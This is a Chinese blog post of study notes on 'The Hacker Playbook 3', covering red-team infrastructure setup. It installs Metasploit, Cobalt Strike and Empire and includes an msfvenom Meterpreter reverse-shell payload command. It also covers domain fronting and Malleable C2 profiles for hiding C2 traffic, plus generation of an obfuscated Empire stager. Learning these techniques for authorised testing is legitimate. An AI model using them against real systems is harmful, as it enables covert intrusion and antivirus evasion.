<!DOCTYPE html>


<html lang="zh-CN">


<head>
  <meta charset="utf-8" />
    
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    黑客秘籍3-赛前准备-1 |  Time
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

</head>

</html>

<body>
  
  <div id="app">
    <main class="content on">
      <section class="outer">
  <article id="post-黑客秘籍3-赛前准备-1" class="article article-type-post" itemscope
  itemprop="blogPost" data-scroll-reveal>

  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  黑客秘籍3-赛前准备-1
</h1>
 

    </header>
    

    
    <div class="article-meta">
      <a href="/2021/01/26/%E9%BB%91%E5%AE%A2%E7%A7%98%E7%B1%8D3-%E8%B5%9B%E5%89%8D%E5%87%86%E5%A4%87-1/" class="article-date">
  <time datetime="2021-01-25T16:08:10.000Z" itemprop="datePublished">2021-01-26</time>
</a>
      
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E9%BB%91%E5%AE%A2%E7%A7%98%E7%B1%8D3/">黑客秘籍3</a>
  </div>

      
      
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> 字数统计:</span>
            <span class="post-count">3.5k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> 阅读时长≈</span>
            <span class="post-count">13 分钟</span>
        </span>
    </span>
</div>

      
    </div>
    

    
    
    <div class="tocbot"></div>





    

    
    <div class="article-entry" itemprop="articleBody">
      
      

      
      <p><img src="../img/26.jpg" alt="30"></p>
<a id="more"></a>

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>最近在阅读黑客秘籍-渗透测试实用指南第二版，在准备环境时发已经出了第三版，所以在本博客作为记录，学习一章便更新一篇作为阅后总结。</p>
<p>本书第三版是以红队视角进行编写，学完本书后希望能对红队有一个完整的了解。</p>
<p>借用B站狂神说JAVA的一句话：只要学不死就往死里学！</p>
<h1 id="赛前准备-安装-1"><a href="#赛前准备-安装-1" class="headerlink" title="赛前准备-安装-1"></a>赛前准备-安装-1</h1><h2 id="外部服务器搭建"><a href="#外部服务器搭建" class="headerlink" title="外部服务器搭建"></a>外部服务器搭建</h2><p>购买国外或国内服务器，如阿里云、腾讯云、华为云、搬瓦工、谷歌云等等。</p>
<p>一台到两台。1核1G或更高都可。</p>
<p>书中推荐使用ubuntu系统，下载 Cert(证书)。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">chmod 600 cert		#只有拥有者有读写权限</span><br></pre></td></tr></table></figure>

<h3 id="搭建渗透测试框架"><a href="#搭建渗透测试框架" class="headerlink" title="搭建渗透测试框架"></a>搭建渗透测试框架</h3><h4 id="PTF-框架"><a href="#PTF-框架" class="headerlink" title="PTF 框架"></a>PTF 框架</h4><blockquote>
<p>书中所注,未使用过</p>
</blockquote>
<p>TrustedSec 公司的渗透测试框架 (PTF)。PTF 框架是一些脚本的合集，可以为你做大量的艰苦工作并为其他所有内容创建了一个框架。让我们通过一个快速示例来安装我们所有的漏洞利用模块，信息收集模块，后渗透利用模块，PowerShell 攻击模块和漏洞分析工具：</p>
<p>安装步骤</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">sudo su -</span><br><span class="line">apt-get update</span><br><span class="line">apt-get install python</span><br><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;trustedsec&#x2F;ptf &#x2F;opt&#x2F;ptf</span><br><span class="line">cd &#x2F;opt&#x2F;ptf &amp;&amp; .&#x2F;ptf</span><br><span class="line">use modules&#x2F;exploitation&#x2F;install_update_all</span><br><span class="line">use modules&#x2F;intelligence-gathering&#x2F;install_update_all</span><br><span class="line">use modules&#x2F;post-exploitation&#x2F;install_update_all</span><br><span class="line">use modules&#x2F;powershell&#x2F;install_update_all</span><br><span class="line">use modules&#x2F;vulnerability-analysis&#x2F;install_update_all</span><br><span class="line">cd &#x2F;pentest</span><br></pre></td></tr></table></figure>



<h4 id="Metasploit"><a href="#Metasploit" class="headerlink" title="Metasploit"></a>Metasploit</h4><p>Metasploit是国内最常用的渗透测试框架之一，集成当下最全的漏洞利用模块，安装方法如下：</p>
<p>ubuntu中添加kali源</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vim &#x2F;etc&#x2F;apt&#x2F;sources.list</span><br><span class="line"></span><br><span class="line">deb http:&#x2F;&#x2F;mirrors.cloud.tencent.com&#x2F;kali&#x2F; kali-rolling main contrib non-free</span><br><span class="line">deb-src http:&#x2F;&#x2F;mirrors.cloud.tencent.com&#x2F;kali&#x2F; kali-rolling main contrib non-free</span><br></pre></td></tr></table></figure>

<p>添加数字签名</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">wget -q -O - https:&#x2F;&#x2F;archive.kali.org&#x2F;archive-key.asc | apt-key add</span><br></pre></td></tr></table></figure>

<p>安装msf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt update&amp;&amp;apt install metaspliot-framework -y  安装</span><br><span class="line"></span><br><span class="line">apt update; apt install metasploit-framework		更新</span><br></pre></td></tr></table></figure>



<h4 id="Cobalt-Strike"><a href="#Cobalt-Strike" class="headerlink" title="Cobalt Strike"></a>Cobalt Strike</h4><p>CS也是目前红队中使用的最广泛的团队协作平台，可自定义插件，跨平台使用（没啥可说，牛逼思密达）</p>
<p>学习文章：<a href="https://github.com/aleenzz/Cobalt_Strike_wiki" target="_blank" rel="noopener">https://github.com/aleenzz/Cobalt_Strike_wiki</a> </p>
<p>下载地址自行查找。。。我准备网上随意找，但是不知道有没有后门，看到我文章的大佬们，自行下载吧。</p>
<p>有java环境即可，下载解压后进去工具目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">执行权限</span><br><span class="line">chmod a+x teamserver  </span><br><span class="line"></span><br><span class="line">运行命令</span><br><span class="line">.&#x2F;teamserver ip 密码</span><br></pre></td></tr></table></figure>

<p>本机运行cobalstrike.jar</p>
<p>输入密码即可，端口未自定义就默认完事</p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0h5ne7gnj313e0is40k.jpg" alt="image-20210126012100233"></p>
<h4 id="Empire"><a href="#Empire" class="headerlink" title="Empire"></a>Empire</h4><p>此工具也是神器，对域渗透支持挺不错，博客中也介绍过此工具的基本使用方法。个人使用的话，感觉不是很稳定。(可能因为服务器原因)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">下载</span><br><span class="line">git clone https:&#x2F;&#x2F;github.com&#x2F;EmpireProject&#x2F;Empire.git</span><br><span class="line"></span><br><span class="line">切换至工具目录setup下</span><br><span class="line">	.&#x2F;install.sh</span><br><span class="line">出现setip comlete则安装成功</span><br><span class="line">	.&#x2F;reset.sh</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/0082zybpgy1gbrhi9oq0tj316c0rkwn9.jpg" alt="image-20200210180914768"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">切换至主目录运行.&#x2F;empire，如果出现错误则使用pip安装模块即可</span><br><span class="line"></span><br><span class="line">若出现无pydispatcher模块名，则使用以下命令解决即可</span><br><span class="line">	pip install PyDispatcher</span><br><span class="line">	</span><br><span class="line">若出现No module named Crypto.Cipher</span><br><span class="line">	pip install pycrypto</span><br></pre></td></tr></table></figure>



<h3 id="混淆-Meterpreter-的-Payload"><a href="#混淆-Meterpreter-的-Payload" class="headerlink" title="混淆 Meterpreter 的 Payload"></a><strong>混淆</strong> <strong>Meterpreter</strong> <strong>的</strong> <strong>Payload</strong></h3><blockquote>
<p>摘录书中</p>
</blockquote>
<p>如果我们正在针对目标进行一些社工尝试，我们可能会使用 Word 或 Excel 文档作为我们的 payload（攻击载荷）的载体。 但是，一个潜在的问题是我们可能无法包含 Meterpreter 的 payload 的二进制文件或让目标机器从 Web下载我们的 payload，因为这些操作可能会触发目标机器中的杀毒软件的警报。 所以，这里给出一个简单的解决方案，使用 PowerShell 进行模糊处理：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -payload windows&#x2F;x64&#x2F;meterpreter_reverse_http -format psh -out meterpreter- 64.ps1 LHOST&#x3D;127.0.0.1</span><br></pre></td></tr></table></figure>

<p>我们甚至可以将混淆提升到新的水平，并使用 Unicorn 等工具生成更多模糊的基于 PowerShell 的 Meterpreter payload，我们将在本书中详细介绍这些混淆器。</p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0h5pxo99j31c2094n4n.jpg" alt="image-20210126012550001"></p>
<p>此外，使用受信任的机构签发的 SSL/TLS 证书可以帮助我们绕过某些网络中的 IDS（入侵检测系统），具体可以参考以下链接实现：Meterpreter Paranoid Mode。</p>
<p>最后，在本书的后面部分，我们将讨论如何重新编译利用 Metasploit/Meterpreter 来绕过基于主机和网络的检测工具。（比较期待）</p>
<h2 id="Cobalt-Strike-1"><a href="#Cobalt-Strike-1" class="headerlink" title="Cobalt Strike"></a>Cobalt Strike</h2><p>什么是 Cobalt Strike 呢？它是一种用来后期持久渗透，横向移动，流量隐藏、数据窃取的工具。 Cobalt Strike 并没有直接的漏洞利用，也没有通过最新的 0-Day 漏洞来破坏系统。当你已经在服务器上执行了 CS 的恶意代码或者将 CS 用作网络钓鱼活动的一部分时，你就能感受到 CS的功能是多么广泛并且强大。 一旦你可以在机器上执行 Cobalt Strike 的 payload，它创建一个 Beacon(远控木马功能)连接回连到 C2 服务器（teamserver）。</p>
<h3 id="域前置"><a href="#域前置" class="headerlink" title="域前置"></a>域前置</h3><p>类似于cdn技术，使用一个正常的域名解析到我们的c2服务器上面，隐藏恶意的流量，这样可规避某些安全监测。</p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0h5nwy93j315u0oeabk.jpg" alt="image-20210126013131538"></p>
<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0h5odk0gj30u00v9gow.jpg" alt="image-20210126013218086"></p>
<p>通过更改 HTTP 主机的 header，CDN 将很轻松的的的地把流量传输回到正确的服务器。红队一直使用这种技术通过使用高信誉域名来隐藏 C2 服务器的流量。</p>
<p>PS：科学上网</p>
<p>使用谷歌产品伪装c2服务器</p>
<p><a href="https://www.cyberark.com/resources/threat-research-blog/red-team-insights-on-https-domain-fronting-google-hosts-using-cobalt-strike" target="_blank" rel="noopener">https://www.cyberark.com/resources/threat-research-blog/red-team-insights-on-https-domain-fronting-google-hosts-using-cobalt-strike</a></p>
<blockquote>
<p>注:在本书出版时，AWS(甚至谷歌云)已经启动实现对域名前置的保护( <a href="https://amzn.to/2I6lSry" target="_blank" rel="noopener">https://amzn.to/2I6lSry</a> )。这并不能</p>
<p>阻止这种类型的攻击，只是需要不同的第三方资源来进行利用。</p>
</blockquote>
<p>阿里巴巴 CDN 域前置技术</p>
<p><a href="https://medium.com/@vysec.private/alibaba-cdn-domain-fronting-1c0754fa0142" target="_blank" rel="noopener">https://medium.com/@vysec.private/alibaba-cdn-domain-fronting-1c0754fa0142</a></p>
<h3 id="定制C2配置文件"><a href="#定制C2配置文件" class="headerlink" title="定制C2配置文件"></a>定制C2配置文件</h3><p>Cobalt Strike 可以操纵你的 Beacon 通信，这对红队成员来说是一个非常有用的特性。使用自定义 C2 配置文件，你可以让所有来自受感染主机系统的流量看起来和普通流量无异。现在我们会发现越来越多的内网环境中会针对第7层网络应用层进行过滤。很多时候蓝队在这层中找寻那些网络通信中的异常流量，那么我们怎样才能让我们的C2通信变得如同正常的 Web 流量呢？这就是可定制 C2 配置文件发挥作用的地方。看看这个例子。阅读这个例子，你会看到一些显而易见的信息：</p>
<p>我们可以看出这将会产生带有URI路径的HTTP请求：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">set uri “&#x2F;s&#x2F;ref&#x3D;nb_sb_noss_1&#x2F;167-3294888-0262949&#x2F;field-keywords&#x3D;books”;</span><br></pre></td></tr></table></figure>

<p>主机 header 设置为 Amazon： </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">header “Host” “www.amazon.com”;</span><br></pre></td></tr></table></figure>

<p>甚至一些自定义服务器的 header 也从 C2 服务器发回：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">header “x-amz-id-1” “THKUYEZKCKPGY5T42PZT”; </span><br><span class="line">header “x-amz-id-2” “a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2t</span><br></pre></td></tr></table></figure>

<p>现在很多红队已经在许多不同的活动中使用了这些配置文件，许多安全厂商已经给所有常见的自定义配置文件创建了指纹签名。为了解决这个问题，我们能做的是: 确保修改了配置文件中的所有静态字符串，确保更改了所有User-Agent 信息，使用真实的证书配置 SSL（不要使用 Cobalt Strike 默认的 SSL 证书），调整抖动率，并更改客户端的的 beacon 时间。 最后一个注意事项是确保通过 POST（http-post）命令进行通信，因为如果不这样做可能会导致使用自定义配置文件时出现很多问题。 如果你的配置文件注明了通过 http-get 进行通信，它仍然有效，但上传大文件将一直被限制。 请记住，GET 请求通常限制在2048个字符以内。</p>
<p>SpectorOps 安全团队还创建了可定制混淆 C2 配置文件的项目.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;github.com&#x2F;bluscreenofjeff&#x2F;Malleable-C2-Randomizer</span><br></pre></td></tr></table></figure>

<blockquote>
<p>译者注: 这个脚本可以将 Cobalt Strike 的配置文件进行混淆来绕过一些基于签名检测的软件，其原理是将变量替换为提供的字典中的随机字符串，然后输出新的 Malleable C2 配置文件。</p>
</blockquote>
<h3 id="Cobalt-Strike-的-Aggressor-脚本"><a href="#Cobalt-Strike-的-Aggressor-脚本" class="headerlink" title="Cobalt Strike 的 Aggressor 脚本"></a><strong>Cobalt Strike</strong> <strong>的</strong> <strong>Aggressor</strong> <strong>脚本</strong></h3><p>Cobalt Strike 项目有很多贡献者。Aggressor 脚本是一种面向红队操作和对手模拟的脚本语言，其灵感来源于可脚本化的 IRC 客户端和机器人。开发它的目的有两个：</p>
<ol>
<li><p>你可以创建长时间运行的机器人来模拟虚拟红队成员，并与你并肩进行黑客攻击</p>
</li>
<li><p>你还可以根据你的需要使用它来扩展和修改 Cobalt Strike 客户端的功能 官方介绍页面：<a href="https://www.cobaltstrike.com/aggressor-script/index.html" target="_blank" rel="noopener">https://www.cobaltstrike.com/aggressor-script/index.html</a></p>
<p>例子：HarleyQu1nn 将不同的 Aggressor 脚本放在一个项目中提供给你用于后续漏洞利用：</p>
<p> <a href="http://bit.ly/2qxIwPE" target="_blank" rel="noopener">http://bit.ly/2qxIwPE</a></p>
</li>
</ol>
<h2 id="PowerShell-Empire"><a href="#PowerShell-Empire" class="headerlink" title="PowerShell Empire"></a><strong>PowerShell Empire</strong></h2><p>​    Empire 是一个后期漏洞利用的框架，包含一个纯 PowerShell2.0 的 Windows 代理和一个纯 Python 2.6/2.7 的Linux/OS X 代理。它是以前的 PowerShell Empire 和 Python EmPyre 项目的合并。 该框架提供了加密安全通信和灵活的架构。在 PowerShell 方面，Empire 实现了无需 powershell.exe 就可运行 PowerShell 代理的功能。并且 Empire 有很多可以快速部署的后期漏洞利用模块，从键盘记录器到 Mimikatz。Empire 还可以调整通信，躲避网络检测。所有的这些功能都封装在一个以实用性为重点的 框架中。对于红队人员来说，PowerShell 是我们最好的朋友之一。在初始化有效 payload 之后，所有随后的攻击都保存在内存中。Empire 最好的地方就是它被开发者积极地维护和更新中，以便你可以使用最新的后期漏洞利用模块进行攻击。 它们还具有适用于 Linux 和 OS X 的 C2 连接。因此，你仍然可以创建基于 MAC 的 Offiffiffice 宏，当执行之后，在 Empire 中拥有一个全新的代理。</p>
<p>​    我们将通过本书更详细地介绍 Empire，以便你了解它的威力如何。在设置 Empire 方面，确保你已安全地配置它非常重要：</p>
<ul>
<li><p>将证书路径 CertPath 设置为一个真实可信的 SSL 证书。</p>
</li>
<li><p>更改 DefaultProfifile 端点。许多第7层防火墙都在寻找确切的静态端点。</p>
</li>
<li><p>更改用于通信的用户代理。</p>
</li>
</ul>
<p>在前两版书中我们提过，Metasploit 的源文件用于自动化，Empire 现在也支持自动运行的脚本，这样可以提高效率。</p>
<p> 运行 Empire：</p>
<ul>
<li>初始化 Empire </li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cd &#x2F;opt&#x2F;Empire &amp;&amp; .&#x2F;setup&#x2F;reset.sh</span><br></pre></td></tr></table></figure>

<ul>
<li>退出</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exit</span><br></pre></td></tr></table></figure>

<ul>
<li>安装证书（最好是使用真实受信任的证书）</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;setup&#x2F;cert.sh</span><br></pre></td></tr></table></figure>

<ul>
<li>开始运行 Empire </li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">.&#x2F;empire</span><br></pre></td></tr></table></figure>

<ul>
<li>创建一个监听器</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">listeners选择你的监听器类型（我们实验使用的是 HTTP） </span><br><span class="line"></span><br><span class="line">uselistener [按两次 tab 键来查阅所有类型的监听器] </span><br><span class="line"></span><br><span class="line">uselistener http</span><br></pre></td></tr></table></figure>

<ul>
<li>查看监听器的全部配置信息</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">info</span><br></pre></td></tr></table></figure>

<ul>
<li>设置以下内容（即设置KillDate 12/12/2020） </li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">KillDate - 规定一个结束时间然后自动清理代理 </span><br><span class="line"></span><br><span class="line">DefaultProfile - 确保更改所有端点（即&#x2F;admin&#x2F;get.php,&#x2F;news.php）。你可以根据需要制作它们，例 </span><br><span class="line"></span><br><span class="line">如&#x2F;seriously&#x2F;notmalware.php </span><br><span class="line"></span><br><span class="line">DefaultProfile - 确保也更改你的用户代理。 我一般是查看使用过的顶级用户代理并选择从中选择一个。 </span><br><span class="line"></span><br><span class="line">Host - 更改为通过端口443的 HTTPS </span><br><span class="line"></span><br><span class="line">CertPath - 添加 SSL 证书的路径 </span><br><span class="line"></span><br><span class="line">UserAgent - 将其更改为你的常用用户代理 </span><br><span class="line"></span><br><span class="line">Port - 设置为443 </span><br><span class="line"></span><br><span class="line">ServerVersion - 将其更改为另一个常见的服务器 Header</span><br></pre></td></tr></table></figure>

<ul>
<li>当你完成所有这些，开启你的监听器</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">execute</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0h5oyewkj31bf0u0n9r.jpg" alt="image-20210126014652875"></p>
<h3 id="配置-Payload"><a href="#配置-Payload" class="headerlink" title="配置 Payload"></a><strong>配置</strong> <strong>Payload</strong></h3><p>payload 是将在受害者系统上运行的实际恶意软件。 这些 payload 可以在 Windows，Linux 和 OSX 中运行，但</p>
<p>Empire 以其基于 PowerShell Windows 的 Payload 而闻名：</p>
<ul>
<li>进入主菜单</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">main</span><br></pre></td></tr></table></figure>

<ul>
<li>为 OSX，Windows，Linux 创建可用的 stager。 我们将创建一个简单的 bat 文件作为示例，但实际上你可以，为 Offiffiffice 文件创建宏或者为一个 USB 橡皮鸭创建 payload（译者注： USB 橡皮鸭/USB RUBBER DUCKY 是最早的按键注入工具)</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">usestager [按两次tab键来查阅所有不同的类型] </span><br><span class="line">usestager windows&#x2F;launcher_bat</span><br></pre></td></tr></table></figure>

<ul>
<li>查看所有设置</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">info</span><br></pre></td></tr></table></figure>

<ul>
<li>配置所有 Settings</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http 把 Listener 设置为 http </span><br><span class="line"></span><br><span class="line">配置 UserAgent(用户代理)</span><br></pre></td></tr></table></figure>

<ul>
<li>创建 Payload</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">generate</span><br></pre></td></tr></table></figure>

<ul>
<li>在另一个终端窗口中查看你的 payload</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat &#x2F;tmp&#x2F;launcher.bat</span><br></pre></td></tr></table></figure>

<p><img src="https://tva1.sinaimg.cn/large/008eGmZEly1gn0h5pevzij31ic0huqga.jpg" alt="image-20210126014935177"></p>
<p>如你所见，创建的 payload 被严重混淆。 你现在可以把这个 .bat 文件丢到任何 Windows 系统上。 当然，你可能会创建一个 Offiffiffice 宏文件或一个USB橡皮鸭（注：USB RUBBER DUCKY/USB 橡皮鸭是最早的按键注入工具）的payload，但这只是众多示例中的一个。</p>
<p>如果你尚未在 Kali 图形界面上安装 PowerShell，那么最好的方法是手动安装它。 在 Kali 上安装 PowerShell：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">apt-get install libunwind8 </span><br><span class="line"></span><br><span class="line">wget http:&#x2F;&#x2F;security.debian.org&#x2F;debian- security&#x2F;pool&#x2F;updates&#x2F;main&#x2F;o&#x2F;openssl&#x2F;libssl1.0.0_1.0.1t-1+deb7u3_amd64.deb </span><br><span class="line"></span><br><span class="line">dpkg -i libssl1.0.0_1.0.1t-1+deb7u3_amd64.deb </span><br><span class="line"></span><br><span class="line">wget http:&#x2F;&#x2F;security.ubuntu.com&#x2F;ubuntu&#x2F;pool&#x2F;main&#x2F;i&#x2F;icu&#x2F;libicu55_55.1- 7ubuntu0.3_amd64.deb </span><br><span class="line"></span><br><span class="line">dpkg -i libicu55_55.1-7ubuntu0.3_amd64.deb </span><br><span class="line"></span><br><span class="line">wget https:&#x2F;&#x2F;github.com&#x2F;PowerShell&#x2F;PowerShell&#x2F;releases&#x2F;download&#x2F;v6.0.2&#x2F;powershell_6.0.2- 1.ubuntu.16.04_amd64.deb </span><br><span class="line"></span><br><span class="line">dpkg -i powershell_6.0.2-1.ubuntu.16.04_amd64.deb</span><br></pre></td></tr></table></figure>



<h2 id="dnscat2"><a href="#dnscat2" class="headerlink" title="dnscat2"></a><strong>dnscat2</strong></h2><h2 id="p0wnedShell"><a href="#p0wnedShell" class="headerlink" title="p0wnedShell"></a><strong>p0wnedShell</strong></h2><h2 id="Pupy-Shell"><a href="#Pupy-Shell" class="headerlink" title="Pupy Shell"></a><strong>Pupy Shell</strong></h2><h2 id="Merlin"><a href="#Merlin" class="headerlink" title="Merlin"></a><strong>Merlin</strong></h2><h2 id="Nishang"><a href="#Nishang" class="headerlink" title="Nishang"></a><strong>Nishang</strong></h2><h2 id="漏洞环境搭建"><a href="#漏洞环境搭建" class="headerlink" title="漏洞环境搭建"></a>漏洞环境搭建</h2><p>下载metasploit2和OWASPBWA漏洞虚拟机，虚拟机中存在常见的漏洞，便于我们理解漏洞和了解攻击手法。</p>
<ul>
<li>metasploit2</li>
<li>OWASPBWA</li>
</ul>
<p>同小型AD域可放置在同一个网络下，构成一个小型域内网，便于后续我们进行测试。</p>

      
      <!-- reward -->
      
    </div>
    
    
      <!-- copyright -->
      
        <div class="declare">
          <ul class="post-copyright">
            <li>
              <i class="ri-copyright-line"></i>
              <strong>版权声明： </strong>
              本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
            </li>
          </ul>
        </div>
        
    <footer class="article-footer">
      
          
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=https://timeshu.github.io/2021/01/26/%E9%BB%91%E5%AE%A2%E7%A7%98%E7%B1%8D3-%E8%B5%9B%E5%89%8D%E5%87%86%E5%A4%87-1/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>
      
      

    </footer>

  </div>

  
  
  <nav class="article-nav">
    
    
      <a href="/2021/01/23/SMTP%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E%E7%8E%AF%E5%A2%83/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">docker封装wordpressSMTP密码重置漏洞环境</div>
      </a>
    
  </nav>


  

  
  
<!-- valine评论 -->
<div id="vcomments-box">
    <div id="vcomments">
    </div>
</div>
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src='https://cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>
<script>
    new Valine({
        el: '#vcomments',
        app_id: '',
        app_key: '',
        path: window.location.pathname,
        notify: false,
        verify: false,
        avatar: 'monsterid',
        placeholder: '给我的文章加点评论吧~',
        recordIP: true
    });
    const infoEle = document.querySelector('#vcomments .info');
    if (infoEle && infoEle.childNodes && infoEle.childNodes.length > 0) {
        infoEle.childNodes.forEach(function (item) {
            item.parentNode.removeChild(item);
        });
    }
</script>
<style>
    #vcomments-box {
        padding: 5px 30px;
    }

    @media screen and (max-width: 800px) {
        #vcomments-box {
